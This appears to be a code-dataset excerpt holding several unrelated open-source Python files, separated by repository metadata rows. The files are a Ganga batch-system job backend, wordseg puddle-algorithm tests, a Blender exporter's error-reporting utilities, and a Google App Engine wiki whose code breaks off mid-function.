if len(job_name_sub_cfg) == 2:
tmp_name = re.sub(*job_name_sub_cfg, tmp_name)
elif not len(job_name_sub_cfg) == 0:
# list is not empty, and not of length 2
logger.warning("jobnamesubstitution should be a list of length 2. Skipping job name substitution.")
return tmp_name
def submit(self, jobconfig, master_input_sandbox):
global re
job = self.getJobObject()
inw = job.getInputWorkspace()
outw = job.getOutputWorkspace()
#scriptpath = self.preparejob(jobconfig,inw,outw)
scriptpath = self.preparejob(jobconfig, master_input_sandbox)
# FIX from Angelo Carbone
# stderr_option = '-e '+str(outw.getPath())+'stderr'
# stdout_option = '-o '+str(outw.getPath())+'stdout'
# FIX from Alex Richards - see Savannah #87477
stdout_option = self.config['stdoutConfig'] % str(outw.getPath())
stderr_option = self.config['stderrConfig'] % str(outw.getPath())
queue_option = ''
if self.queue:
if isType(self, Slurm):
queue_option = '-p ' + str(self.queue)
else:
queue_option = '-q ' + str(self.queue)
try:
jobnameopt = "-" + self.config['jobnameopt']
except Exception as err:
logger.debug("Unknown error: %s" % str(err))
jobnameopt = False
if self.extraopts:
for opt in re.compile(r'(-\w+)').findall(self.extraopts):
if opt in ('-o', '-e', '-oo', '-eo'):
logger.warning("option %s is forbidden", opt)
return False
if self.queue:
if isType(self, Slurm):
if opt == '-p':
logger.warning("option %s is forbidden if partition is defined ( partition = '%s')", opt, self.queue)
return False
elif opt == '-q':
logger.warning("option %s is forbidden if queue is defined ( queue = '%s')", opt, self.queue)
return False
if jobnameopt and opt == jobnameopt:
jobnameopt = False
queue_option = queue_option + " " + self.extraopts
if jobnameopt and job.name != '':
tmp_name = self._getLegalJobName(job)
queue_option = queue_option + " " + \
jobnameopt + " " + "'%s'" % (tmp_name)
# bugfix #16646
if self.config['shared_python_executable']:
import sys
script_cmd = "%s %s" % (sys.executable, scriptpath)
else:
script_cmd = scriptpath
command_str = self.config['submit_str'] % (inw.getPath(), queue_option, stderr_option, stdout_option, script_cmd)
self.command_string = command_str
rc, soutfile = self.command(command_str)
with open(soutfile) as sout_file:
sout = sout_file.read()
m = re.compile(self.config['submit_res_pattern'], re.M).search(sout)
if m is None:
logger.warning('could not match the output and extract the Batch job identifier!')
logger.warning('command output \n %s ', sout)
else:
self.id = m.group('id')
try:
queue = m.group('queue')
if self.queue != queue:
if self.queue:
logger.warning('you requested queue "%s" but the job was submitted to queue "%s"', self.queue, queue)
logger.warning('command output \n %s ', sout)
else:
logger.info('using default queue "%s"', queue)
self.actualqueue = queue
except IndexError:
logger.info('could not match the output and extract the Batch queue name')
# clean up the tmp file
if os.path.exists(soutfile):
os.remove(soutfile)
return rc == 0
def resubmit(self):
global re
job = self.getJobObject()
inw = job.getInputWorkspace()
outw = job.getOutputWorkspace()
statusfilename = outw.getPath('__jobstatus__')
try:
os.remove(statusfilename)
except OSError as x:
if x.errno != 2:
logger.warning("OSError:" + str(x))
scriptpath = inw.getPath('__jobscript__')
#stderr_option = '-e '+str(outw.getPath())+'stderr'
#stdout_option = '-o '+str(outw.getPath())+'stdout'
# FIX from Alex Richards - see Savannah #87477
stdout_option = self.config['stdoutConfig'] % str(outw.getPath())
stderr_option = self.config['stderrConfig'] % str(outw.getPath())
queue_option = ''
if self.queue:
if isType(self, Slurm):
queue_option = '-p ' + str(self.queue)
else:
queue_option = '-q ' + str(self.queue)
try:
jobnameopt = "-" + self.config['jobnameopt']
except Exception as err:
logger.debug("Err: %s" % str(err))
jobnameopt = False
if self.extraopts:
for opt in re.compile(r'(-\w+)').findall(self.extraopts):
if opt in ('-o', '-e', '-oo', '-eo'):
logger.warning("option %s is forbidden", opt)
return False
if self.queue:
if isType(self, Slurm):
if opt == '-p':
logger.warning("option %s is forbidden if partition is defined ( partition = '%s')", opt, self.queue)
return False
elif opt == '-q':
logger.warning("option %s is forbidden if queue is defined ( queue = '%s')", opt, self.queue)
return False
if jobnameopt and opt == jobnameopt:
jobnameopt = False
queue_option = queue_option + " " + self.extraopts
if jobnameopt and job.name != '':
# PBS doesn't like names with spaces
tmp_name = self._getLegalJobName(job)
queue_option = queue_option + " " + \
jobnameopt + " " + "'%s'" % (tmp_name)
# bugfix #16646
if self.config['shared_python_executable']:
import sys
script_cmd = "%s %s" % (sys.executable, scriptpath)
else:
script_cmd = scriptpath
command_str = self.config['submit_str'] % (
inw.getPath(), queue_option, stderr_option, stdout_option, script_cmd)
self.command_string = command_str
rc, soutfile = self.command(command_str)
logger.debug('from command get rc: "%d"', rc)
if rc == 0:
with open(soutfile) as sout_file:
sout = sout_file.read()
m = re.compile(
self.config['submit_res_pattern'], re.M).search(sout)
if m is None:
logger.warning('could not match the output and extract the Batch job identifier!')
logger.warning('command output \n %s ', sout)
else:
self.id = m.group('id')
try:
queue = m.group('queue')
if self.queue != queue:
if self.queue:
logger.warning('you requested queue "%s" but the job was submitted to queue "%s"', self.queue, queue)
logger.warning('command output \n %s ', sout)
else:
logger.info('using default queue "%s"', queue)
self.actualqueue = queue
except IndexError:
logger.info('could not match the output and extract the Batch queue name')
else:
with open(soutfile) as sout_file:
logger.warning(sout_file.read())
# clean up the tmp file
if os.path.exists(soutfile):
os.remove(soutfile)
return rc == 0
def kill(self):
rc, soutfile = self.command(self.config['kill_str'] % (self.id))
with open(soutfile) as sout_file:
sout = sout_file.read()
# clean up the tmp file
if os.path.exists(soutfile):
os.remove(soutfile)
logger.debug('while killing job %s: rc = %d', self.getJobObject().getFQID('.'), rc)
if rc == 0:
return True
else:
global re
m = re.compile(self.config['kill_res_pattern'], re.M).search(sout)
logger.warning('while killing job %s: %s', self.getJobObject().getFQID('.'), sout)
return m is not None
def getStateTime(self, status):
"""Obtains the timestamps for the 'running', 'completed', and 'failed' states.
The __jobstatus__ file in the job's output directory is read to obtain the start and stop times of the job.
These are converted into datetime objects and returned to the user.
"""
j = self.getJobObject()
end_list = ['completed', 'failed']
d = {}
checkstr = ''
if status == 'running':
checkstr = 'START:'
elif status == 'completed':
checkstr = 'STOP:'
elif status == 'failed':
checkstr = 'FAILED:'
else:
checkstr = ''
if checkstr == '':
logger.debug("In getStateTime(): checkstr == ''")
return None
try:
p = os.path.join(j.outputdir, '__jobstatus__')
logger.debug("Opening output file at: %s", p)
f = open(p)
except IOError:
logger.debug('unable to open file %s', p)
return None
for l in f:
if checkstr in l:
pos = l.find(checkstr)
timestr = l[pos + len(checkstr) + 1:pos + len(checkstr) + 25]
try:
t = datetime.datetime(
*(time.strptime(timestr, "%a %b %d %H:%M:%S %Y")[0:6]))
except ValueError:
logger.debug("Value Error in file: '%s': string does not match required format.", p)
return None
return t
f.close()
logger.debug("Reached the end of getStateTime('%s'). Returning None.", status)
return None
def timedetails(self):
"""Return all available timestamps from this backend.
"""
j = self.getJobObject()
# check for file. if it's not there don't bother calling getSateTime
# (twice!)
p = os.path.join(j.outputdir, '__jobstatus__')
if not os.path.isfile(p):
logger.error('unable to open file %s', p)
return None
r = self.getStateTime('running')
c = self.getStateTime('completed')
d = {'START': r, 'STOP': c}
return d
def preparejob(self, jobconfig, master_input_sandbox):
job = self.getJobObject()
mon = job.getMonitoringService()
import GangaCore.Core.Sandbox as Sandbox
from GangaCore.GPIDev.Lib.File import File
from GangaCore.Core.Sandbox.WNSandbox import PYTHON_DIR
import inspect
virtualization = job.virtualization
utilFiles= []
fileutils = File( inspect.getsourcefile(GangaCore.Utility.files), subdir=PYTHON_DIR )
utilFiles.append(fileutils)
if virtualization:
virtualizationutils = File( inspect.getsourcefile(GangaCore.Utility.Virtualization), subdir=PYTHON_DIR )
utilFiles.append(virtualizationutils)
sharedfiles = jobconfig.getSharedFiles()
subjob_input_sandbox = job.createPackedInputSandbox(jobconfig.getSandboxFiles() + utilFiles )
appscriptpath = [jobconfig.getExeString()] + jobconfig.getArgStrings()
sharedoutputpath = job.getOutputWorkspace().getPath()
## FIXME Check this isn't a GangaList
outputpatterns = jobconfig.outputbox
environment = jobconfig.env if not jobconfig.env is None else {}
import inspect
script_location = os.path.join(os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe()))),
'BatchScriptTemplate.py.template')
from GangaCore.GPIDev.Lib.File import FileUtils
text = FileUtils.loadScript(script_location, '')
if virtualization:
text = virtualization.modify_script(text)
import GangaCore.Core.Sandbox as Sandbox
import GangaCore.Utility as Utility
from GangaCore.Utility.Config import getConfig
from GangaCore.GPIDev.Lib.File.OutputFileManager import getWNCodeForOutputSandbox, getWNCodeForOutputPostprocessing, getWNCodeForDownloadingInputFiles, getWNCodeForInputdataListCreation
jobidRepr = repr(self.getJobObject().getFQID('.'))
replace_dict = {
'###OUTPUTSANDBOXPOSTPROCESSING###' : getWNCodeForOutputSandbox(job, ['__syslog__'], jobidRepr),
'###OUTPUTUPLOADSPOSTPROCESSING###' : getWNCodeForOutputPostprocessing(job, ''),
'###DOWNLOADINPUTFILES###' : getWNCodeForDownloadingInputFiles(job, ''),
'###INLINEMODULES###' : inspect.getsource(Sandbox.WNSandbox),
'###INLINEHOSTNAMEFUNCTION###' : inspect.getsource(Utility.util.hostname),
'###APPSCRIPTPATH###' : repr(appscriptpath),
#'###SHAREDINPUTPATH###' : repr(sharedinputpath)),
'###INPUT_SANDBOX###' : repr(subjob_input_sandbox + master_input_sandbox + sharedfiles),
'###CREATEINPUTDATALIST###' : getWNCodeForInputdataListCreation(job, ''),
'###SHAREDOUTPUTPATH###' : repr(sharedoutputpath),
'###OUTPUTPATTERNS###' : repr(outputpatterns),
'###JOBID###' : jobidRepr,
'###ENVIRONMENT###' : repr(environment),
'###PREEXECUTE###' : self.config['preexecute'],
'###POSTEXECUTE###' : self.config['postexecute'],
'###JOBIDNAME###' : self.config['jobid_name'],
'###QUEUENAME###' : self.config['queue_name'],
'###HEARTBEATFREQUENCE###' : self.config['heartbeat_frequency'],
'###INPUT_DIR###' : repr(job.getStringInputDir()),
'###GANGADIR###' : repr(getConfig('System')['GANGA_PYTHONPATH'])
}
for k, v in replace_dict.items():
text = text.replace(str(k), str(v))
logger.debug('subjob input sandbox %s ', subjob_input_sandbox)
logger.debug('master input sandbox %s ', master_input_sandbox)
from GangaCore.GPIDev.Lib.File import FileBuffer
return job.getInputWorkspace().writefile(FileBuffer('__jobscript__', text), executable=1)
@staticmethod
def updateMonitoringInformation(jobs):
global re
repid = re.compile(r'^PID: (?P<pid>\d+)', re.M)
requeue = re.compile(r'^QUEUE: (?P<queue>\S+)', re.M)
reactualCE = re.compile(r'^ACTUALCE: (?P<actualCE>\S+)', re.M)
reexit = re.compile(r'^EXITCODE: (?P<exitcode>\d+)', re.M)
def get_last_alive(f):
"""Time since the statusfile was last touched in seconds"""
import os.path
import time
talive = 0
try:
talive = time.time() - os.path.getmtime(f)
except OSError as x:
logger.debug('Problem reading status file: %s (%s)', f, str(x))
return talive
def get_status(f):
"""Give (pid,queue,actualCE,exit code) for job"""
pid, queue, actualCE, exitcode = None, None, None, None
global re
statusfile = None
try:
statusfile = open(f)
stat = statusfile.read()
except IOError as x:
logger.debug('Problem reading status file: %s (%s)', f, str(x))
return pid, queue, actualCE, exitcode
finally:
if statusfile:
statusfile.close()
mpid = repid.search(stat)
if mpid:
pid = int(mpid.group('pid'))
mqueue = requeue.search(stat)
if mqueue:
queue = str(mqueue.group('queue'))
mactualCE = reactualCE.search(stat)
if mactualCE:
actualCE = str(mactualCE.group('actualCE'))
mexit = reexit.search(stat)
if mexit:
exitcode = int(mexit.group('exitcode'))
return pid, queue, actualCE, exitcode
from GangaCore.Utility.Config import getConfig
for j in jobs:
stripProxy(j)._getSessionLock()
outw = j.getOutputWorkspace()
statusfile = os.path.join(outw.getPath(), '__jobstatus__')
heartbeatfile = os.path.join(outw.getPath(), '__heartbeat__')
pid, queue, actualCE, exitcode = get_status(statusfile)
if j.status == 'submitted':
if pid or queue:
j.updateStatus('running')
if pid:
j.backend.id = pid
if queue and queue != j.backend.actualqueue:
j.backend.actualqueue = queue
if actualCE:
j.backend.actualCE = actualCE
if j.status == 'running':
if exitcode is not None:
# Job has finished
j.backend.exitcode = exitcode
if exitcode == 0:
j.updateStatus('completed')
else:
j.updateStatus('failed')
else:
# Job is still running. Check if alive
time = get_last_alive(heartbeatfile)
config = getConfig(getName(j.backend))
if time > config['timeout']:
logger.warning(
'Job %s has disappeared from the batch system.', str(j.getFQID('.')))
j.updateStatus('failed')
#_________________________________________________________________________
class LSF(Batch):
''' LSF backend - submit jobs to Load Sharing Facility.'''
_schema = Batch._schema.inherit_copy()
_category = 'backends'
_name = 'LSF'
config = GangaCore.Utility.Config.getConfig('LSF')
def __init__(self):
super(LSF, self).__init__()
#_________________________________________________________________________
class PBS(Batch):
''' PBS backend - submit jobs to Portable Batch System.
'''
_schema = Batch._schema.inherit_copy()
_category = 'backends'
_name = 'PBS'
config = GangaCore.Utility.Config.getConfig('PBS')
def __init__(self):
super(PBS, self).__init__()
#_________________________________________________________________________
class SGE(Batch):
''' SGE backend - submit jobs to Sun Grid Engine.
'''
_schema = Batch._schema.inherit_copy()
_category = 'backends'
_name = 'SGE'
config = GangaCore.Utility.Config.getConfig('SGE')
def __init__(self):
super(SGE, self).__init__()
#_________________________________________________________________________
class Slurm(Batch):
''' Slurm backend - submit jobs to Slurm.
'''
_schema = Batch._schema.inherit_copy()
_category = 'backends'
_name = 'Slurm'
config = GangaCore.Utility.Config.getConfig('Slurm')
def __init__(self):
super(Slurm, self).__init__()
| gpl-2.0 | 5,901,647,742,991,185,000 | 37.384025 | 193 | 0.553506 | false |
bootphon/wordseg | test/test_algo_puddle.py | 1 | 3074 | """Test of the wordseg.algos.puddle module"""
import codecs
import copy
import os
import pytest
from wordseg.separator import Separator
from wordseg.prepare import gold, prepare
from wordseg.evaluate import evaluate
from wordseg.algos import puddle
@pytest.mark.parametrize(
'window, nfolds, njobs, by_frequency',
[(w, f, j, b)
for w in (1, 3) for f in (1, 3) for j in (3, 5) for b in (True, False)])
def test_puddle(prep, window, nfolds, njobs, by_frequency):
out = list(puddle.segment(
prep, window=window, by_frequency=by_frequency,
nfolds=nfolds, njobs=njobs))
s = Separator().remove
assert len(out) == len(prep)
for n, (a, b) in enumerate(zip(out, prep)):
assert s(a) == s(b), 'line {}: "{}" != "{}"'.format(n+1, s(a), s(b))
def test_empty_line(prep):
with pytest.raises(ValueError) as err:
puddle.segment(prep[:2] + [''] + prep[4:])
assert 'utterance is empty' in str(err)
def test_replicate(datadir):
sep = Separator()
_tags = [utt for utt in codecs.open(
os.path.join(datadir, 'tagged.txt'), 'r', encoding='utf8')
if utt][:100] # 100 first lines only
_prepared = prepare(_tags, separator=sep)
_gold = gold(_tags, separator=sep)
segmented = puddle.segment(_prepared, nfolds=1)
score = evaluate(segmented, _gold)
# we obtained that score from the dibs version in CDSWordSeg
# (using wordseg.prepare and wordseg.evaluate in both cases)
expected = {
'type_fscore': 0.06369,
'type_precision': 0.1075,
'type_recall': 0.04525,
'token_fscore': 0.06295,
'token_precision': 0.2056,
'token_recall': 0.03716,
'boundary_all_fscore': 0.4605,
'boundary_all_precision': 1.0,
'boundary_all_recall': 0.2991,
'boundary_noedge_fscore': 0.02806,
'boundary_noedge_precision': 1.0,
'boundary_noedge_recall': 0.01423}
assert score == pytest.approx(expected, rel=1e-3)
def test_train_text(prep):
train_text = prep[:10]
test_text = prep[10:]
# offline learning on train_text
segmented1 = list(puddle.segment(test_text, train_text=train_text))
# online learning
segmented2 = list(puddle.segment(test_text, nfolds=1))
def join(s):
return ''.join(s).replace(' ', '')
assert len(test_text) == len(segmented1) == len(segmented2)
assert join(test_text) == join(segmented1) == join(segmented2)
def test_segment_only(prep):
train_text = prep[:10]
test_text = prep[10:]
# train a model on train_text
model = puddle.Puddle()
model.train(train_text)
model_backup = copy.deepcopy(model)
# ensure the model is not updated during segmentation
segmented = list(model.segment(test_text, update_model=False))
assert len(segmented) == len(test_text)
assert model == model_backup
# ensure the model is updated during segmentation
segmented = list(model.segment(test_text, update_model=True))
assert len(segmented) == len(test_text)
assert model != model_backup
| gpl-3.0 | 2,863,014,731,301,385,000 | 29.74 | 77 | 0.639232 | false |
WorldSEnder/MCAnm | scripts/io_export_mhfc/utils.py | 1 | 11769 | # Logging: easier workflow with some utility methods to log and handle errors
from collections import defaultdict, namedtuple
from enum import Enum
import bpy
import os
import sys
import traceback
class LogLevel(Enum):
DEBUG = 'debug'
INFO = 'info'
WARNING = 'warning'
ERROR = 'error'
FATAL = 'fatal'
def is_fatal(self):
return self == LogLevel.ERROR or self == LogLevel.FATAL
def get_bl_report_level(self):
if self == LogLevel.DEBUG:
return {'DEBUG'}
if self == LogLevel.INFO:
return {'INFO'}
if self == LogLevel.WARNING:
return {'WARNING'}
if self == LogLevel.ERROR:
return {'ERROR_INVALID_INPUT'}
if self == LogLevel.FATAL:
return {'ERROR'}
ReportItem = namedtuple('ReportItem', 'message etype value traceback')
class Report(object):
_reports = None
def __init__(self):
self._reports = defaultdict(list)
def extend(self, other):
"""Append another report to this one
"""
for level in other._reports:
self._reports[level].extend(other._reports[level])
def append(self, message, level=LogLevel.INFO, cause=None):
if cause is None:
cause = sys.exc_info()
etype, val, trace = cause
self._reports[level].append(ReportItem(message, etype, val, trace))
return self
def get_items(self, level):
return self._reports[level]
def contains_fatal(self):
for level in self._reports:
if level.is_fatal() and self._reports[level]:
return True
return False
def print_report(self, op):
for level in self._reports:
op_level = level.get_bl_report_level()
for item in self.get_items(level):
op.report(op_level, str(item.message))
if level.is_fatal():
formatted = traceback.format_exception(
item.etype, item.value, item.traceback)
op.report(op_level, ''.join(formatted))
class ReportedError(RuntimeError):
"""Thrown when a Reporter fails to run. That is an error or a fatal exception occured during
running it.
"""
report = None
_target = None
def __init__(self, message, target=None):
super(ReportedError, self).__init__(message)
self.report = Report()
self._target = target
def is_aimed_at(self, candidate):
return self._target is None or self._target is candidate
@classmethod
def throw_from_exception(cls, reporter, level=LogLevel.ERROR, exc=None):
"""Constructs a ReportedError from the current exception handling context.
"""
if exc is None:
exc = sys.exc_info()
_, exc_value, _ = exc
message = "An error occured: " + str(exc_value)
reported = cls(message, target=reporter)
reported.report.append(message, level=level, cause=exc)
raise reported from exc_value
def static_access(func):
"""Provides static access to member functions by calling the function with self set to None
"""
import functools
class Functor(object):
def __get__(self, instance, owner):
# DON'T CHECK FOR instance is None, unlike functions, which then
# return themselves
return functools.partial(func, instance)
return Functor()
class Reporter(object):
"""Via this class one can make reports of a process. That is return warnings, errors and
fatal exceptions
"""
_stack = []
_report = None
_caught = None
_engaged = None
_bl_op = None
def __init__(self, caught_types=(Exception,), reported_to=None):
"""@param caught_types: A repeatable-iterable containing classinfos that will be used to check if an exception of type exc_t
should be caught or not. A caught exception will be logged as LogLevel.ERROR and not passed onwards. Note that
each entry of caught_types can be either a class or a tuple of classes and will be checked via issubclass(exc_t, entry).
Note that this does not change how an ReportedError is handled. They are reported if they
belong to this reporter.
"""
self._report = Report()
self._caught = caught_types
self._engaged = False
self._bl_op = reported_to
# The following will check that the given caught_types is indeed legal
# by performing a dummy check
self._should_catch(type(None))
def _should_catch(self, exc_type):
return any(issubclass(exc_type, ct) for ct in self._caught)
def __enter__(self):
if self._engaged:
raise RuntimeError("No multi-entry into a reporter allowed")
self._engaged = True
Reporter._stack.append(self)
return self
def __exit__(self, exc_type, exc_value, traceback):
try:
exc = (exc_type, exc_value, traceback)
if exc_value is None:
# Completed normally, yay
return False
if isinstance(exc_value, ReportedError):
# Allows for nesting of multiple reporters
if exc_value.is_aimed_at(self):
self._report.extend(exc_value.report)
return True # Catch it, was ours
else:
exc_value.report.extend(self._report)
return False # Pass it on, to another reporter
if self._should_catch(exc_type):
self._report.append(exc_value, level=LogLevel.ERROR, cause=exc)
return True
return False
finally:
self._engaged = False
if self._bl_op is not None:
self.print_report(self._bl_op)
assert(Reporter._stack.pop() is self)
def rebind_bl_op(self, op):
"""Binds a Blender op that will be reported to when this Reporter __exit__s
"""
self._bl_op = op
@classmethod
def _get_reporter(cls, proposed):
if proposed is not None:
return proposed
if not cls._stack:
return None
return cls._stack[-1]
@static_access
def warning(self, message, *args, **wargs):
"""When something happened that can be recovered from but isn't
conformant never-the-less
"""
self = Reporter._get_reporter(self)
if self is None:
return
formatted = message.format(*args, **wargs)
self._report.append(formatted, level=LogLevel.WARNING)
@static_access
def info(self, message, *args, **wargs):
"""A useful information for the user
"""
self = Reporter._get_reporter(self)
if self is None:
return
formatted = message.format(*args, **wargs)
self._report.append(formatted, level=LogLevel.INFO)
@static_access
def debug(self, message, *args, **wargs):
"""Debug output, only output during debug mode
"""
self = Reporter._get_reporter(self)
if self is None:
return
formatted = message.format(*args, **wargs)
self._report.append(formatted, level=LogLevel.DEBUG)
@static_access
def error(self, message, *args, cause=None, **wargs):
"""When something happened that can't conform with the specification.
Aka: the user's fault
"""
if self is not None and not self._engaged:
raise RuntimeError(
"Can't file an error without __enter__'ing this Reporter")
formatted = message.format(*args, **wargs)
try:
raise RuntimeError(formatted) from cause
except RuntimeError:
ReportedError.throw_from_exception(self, level=LogLevel.FATAL)
@static_access
def fatal(self, message, *args, cause=None, **wargs):
"""
When something happened that really shouldn't happen.
Aka: my fault
"""
if self is not None and not self._engaged:
raise RuntimeError(
"Can't file an error without __enter__'ing this Reporter")
formatted = message.format(*args, **wargs)
message = "This should not have happened. Report to WorldSEnder:\n{mess}".format(
mess=formatted)
try:
raise RuntimeError(message) from cause
except RuntimeError:
ReportedError.throw_from_exception(self, level=LogLevel.FATAL)
def print_report(self, op):
self._report.print_report(op)
def was_success(self):
return not self._report.contains_fatal()
def extract_safe(collection, key, mess_on_fail, *args, on_fail=Reporter.error, **wargs):
"""Ensures that the item is in the collection by reporting an error with
the specified message if not.
Calls on_fail when it fails to extract the element with the formatted message and
the keyword argument 'cause' set to the KeyError that caused it to fail
@param collection: the collection to search in
@param key: the key to search for
@param mess_on_fail: a message that will get formatted and handed to on_fail
@param on_fail: called when the key is not found in the collection as on_fail(formatted_message, cause=e)
where e is the KeyError thrown by the collection. The result of this function is returned instead
@param args: formatting arguments
@param wargs: additional formatting keyword-arguments. Can not be 'coll' or 'item', those will be
provided by default as the collection and the searched key
@returns the item in the collection for the specified key or the result of on_fail if a KeyError is
raised by collection[key]
"""
try:
return collection[key]
except KeyError as e:
return on_fail(mess_on_fail.format(*args, coll=collection, item=key, **wargs), cause=e)
def to_valid_loc(assetstr):
'''Replaces all non Java Characters with '_' to form a valid package/class name
@see also http://docs.oracle.com/javase/specs/jls/se8/html/jls-3.html#jls-IdentifierChars
'''
# TODO: replace all nonconforming characters with '_' (UNDERSCORE)
#assetstr = '_'.join(re.split(r'[[\x00-\x40\x5b-\x60]--[{pathsep}]]'.format(pathsep=os.path.sep), assetstr))
# if re.match(r'^[0-9]') is not None:
# assetstr = '_'+assetstr
# return assetstr
# ^ that requires Regex Set Operations
return assetstr.replace(' ', '_')
def asset_to_dir(assetstr):
"""Translates and minecraft asset string to a filesystem path. If the path is non conformant, an
error is reported
"""
if not assetstr:
Reporter.error("Asset-String can't be empty")
*resourceDomains, resourcePath = assetstr.split(':')
if not resourceDomains:
resourceDomains = ["minecraft"]
if len(resourceDomains) > 1:
Reporter.error(
"Asset-String {loc} can't contain more than one ':'".format(loc=assetstr))
domain = resourceDomains[0].lower()
path = resourcePath.lower()
if not domain or not path:
Reporter.error(
"Asset-String {loc}: Splitted string mustn't be empty".format(loc=assetstr))
return "assets/{mod}/{file}".format(mod=domain, file=path)
def openw_save(filepath, flags, *args, **wargs):
"""
Ensures that the directory for the filepath exists and creates it if
necessary. Returns a file_handle to the open stream by calling
open(filepath, flags, *args, **wargs)
"""
filepath = bpy.path.abspath(filepath)
directory = os.path.dirname(filepath)
if not os.path.exists(directory):
os.makedirs(directory)
return open(filepath, flags, *args, **wargs)
| gpl-2.0 | -32,218,441,258,716,172 | 34.990826 | 132 | 0.619169 | false |
elliotf/appenginewiki | wiki.py | 1 | 9987 | #!/usr/bin/env python
#
# Copyright 2008 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A simple Google App Engine wiki application.
The main distinguishing feature is that editing is in a WYSIWYG editor
rather than a text editor with special syntax. This application uses
google.appengine.api.datastore to access the datastore. This is a
lower-level API on which google.appengine.ext.db depends.
"""
#__author__ = 'Bret Taylor'
__author__ = 'Elliot Foster'
import cgi
import datetime
import os
import re
import sys
import urllib
import urlparse
import logging
import wikimarkup
from google.appengine.api import datastore
from google.appengine.api import datastore_types
from google.appengine.api import users
from google.appengine.ext import webapp
from google.appengine.ext.webapp import template
from google.appengine.ext.webapp.util import run_wsgi_app
# for Data::Dumper-like stuff
#import pprint
#pp = pprint.PrettyPrinter(indent=4)
#lib_path = os.path.join(os.path.dirname(__file__), 'lib')
#sys.path.append(lib_path)
_DEBUG = True
class BaseRequestHandler(webapp.RequestHandler):
def generate(self, template_name, template_values={}):
values = {
'request': self.request,
'user': users.get_current_user(),
'login_url': users.create_login_url(self.request.uri),
'logout_url': users.create_logout_url(self.request.uri),
'application_name': 'lilwiki',
}
values.update(template_values)
directory = os.path.dirname(__file__)
path = os.path.join(directory, os.path.join('templates', template_name))
self.response.out.write(template.render(path, values, debug=_DEBUG))
def head(self, *args):
pass
def get(self, *args):
pass
def post(self, *args):
pass
class MainPageHandler(BaseRequestHandler):
def get(self):
user = users.get_current_user();
if not user:
self.redirect(users.create_login_url(self.request.uri))
return
query = datastore.Query('Page')
query['owner'] = user
query.Order(('modified', datastore.Query.DESCENDING))
page_list = []
for entity in query.Get(100):
page_list.append(Page(entity['name'], entity))
self.generate('index.html', {
'pages': page_list,
})
class PageRequestHandler(BaseRequestHandler):
def get(self, page_name):
# if we don't have a user, we won't know which namespace to use (for now)
user = users.get_current_user()
if not user:
self.redirect(users.create_login_url(self.request.uri))
page_name = urllib.unquote(page_name)
page = Page.load(page_name, user)
modes = ['view', 'edit']
mode = self.request.get('mode')
if not page.entity:
logging.debug('page "' + page_name + '" not found, creating new instance.')
mode = 'edit'
if not mode in modes:
logging.debug('defaulting mode to view')
mode = 'view'
self.generate(mode + '.html', {
'page': page,
})
def post(self, page_name):
user = users.get_current_user()
if not user:
self.redirect(users.create_login_url(self.request.uri))
return
page_name = urllib.unquote(page_name)
page = Page.load(page_name, user)
page.content = self.request.get('content')
page.save()
self.redirect(page.view_url())
class Page(object):
""" A wiki page, has attributes:
name
content
owner
is_public -- implement later
"""
def __init__(self, name, entity=None):
self.name = name
self.entity = entity
if entity:
self.content = entity['content']
self.owner = entity['owner']
self.modified = entity['modified']
else:
self.content = '= ' + self.name + " =\n\nStarting writing about " + self.name + ' here.'
def entity(self):
return self.entity
def edit_url(self):
return '/%s?mode=edit' % (urllib.quote(self.name))
def view_url(self):
name = self.name
name = urllib.quote(name)
return '/' + name
def save(self):
if self.entity:
entity = self.entity
logging.debug('saving existing page ' + self.name)
else:
logging.debug('saving new page ' + self.name)
entity = datastore.Entity('Page')
entity['owner'] = users.get_current_user()
entity['name'] = self.name
entity['content'] = datastore_types.Text(self.content)
entity['modified'] = datetime.datetime.now()
datastore.Put(entity)
def wikified_content(self):
# TODO: check memcache for rendered page?
# replacements here
transforms = [
AutoLink(),
WikiWords(),
HideReferers(),
]
content = self.content
content = wikimarkup.parse(content)
for transform in transforms:
content = transform.run(content, self)
return content
@staticmethod
def load(name, owner):
if not owner:
owner = users.get_current_user()
query = datastore.Query('Page')
query['name'] = name
query['owner'] = owner
entities = query.Get(1)
if len(entities) < 1:
return Page(name)
else:
return Page(name, entities[0])
@staticmethod
def exists(name, owner):
logging.debug('looking up ' + name)
if not owner:
logging.debug('Were not given a user when looking up ' + name)
owner = users.get_current_user()
return Page.load(name, owner).entity
class Transform(object):
"""Abstraction for a regular expression transform.
Transform subclasses have two properties:
regexp: the regular expression defining what will be replaced
replace(MatchObject): returns a string replacement for a regexp match
We iterate over all matches for that regular expression, calling replace()
on the match to determine what text should replace the matched text.
The Transform class is more expressive than regular expression replacement
because the replace() method can execute arbitrary code to, e.g., look
up a WikiWord to see if the page exists before determining if the WikiWord
should be a link.
"""
def run(self, content, page):
"""Runs this transform over the given content.
Args:
content: The string data to apply a transformation to.
Returns:
A new string that is the result of this transform.
"""
self.page = page
parts = []
offset = 0
for match in self.regexp.finditer(content):
parts.append(content[offset:match.start(0)])
parts.append(self.replace(match))
offset = match.end(0)
parts.append(content[offset:])
return ''.join(parts)
class WikiWords(Transform):
"""Translates WikiWords to links.
"""
def __init__(self):
self.regexp = re.compile(r'(?<![A-Za-z])[A-Z][a-z]*([A-Z][a-z]+/?)+(?P<link_close>[^<]*</[Aa]>)?')
def replace(self, match):
wikiword = match.group(0)
if (match.group('link_close')):
# we're inside a link element, so don't rewrite
return wikiword
if wikiword == self.page.name:
# don't link to the current page
return wikiword
if Page.exists(wikiword, self.page.owner):
# link to that page
return '<a class="wikiword" href="/%s">%s</a>' % (wikiword, wikiword)
else:
# link to that page, making it clear it does not exist.
return '<a class="wikiword missing" href="/%s">%s?</a>' % (wikiword, wikiword)
class AutoLink(Transform):
"""A transform that auto-links URLs."""
def __init__(self):
self.regexp = re.compile(r'([^"])\b((http|https)://[^ \t\n\r<>\(\)&"]+' \
r'[^ \t\n\r<>\(\)&"\.])')
def replace(self, match):
url = match.group(2)
return match.group(1) + '<a class="autourl" href="%s">%s</a>' % (url, url)
class HideReferers(Transform):
"""A transform that hides referers for external hyperlinks."""
def __init__(self):
self.regexp = re.compile(r'href="(http[^"]+)"')
def replace(self, match):
url = match.group(1)
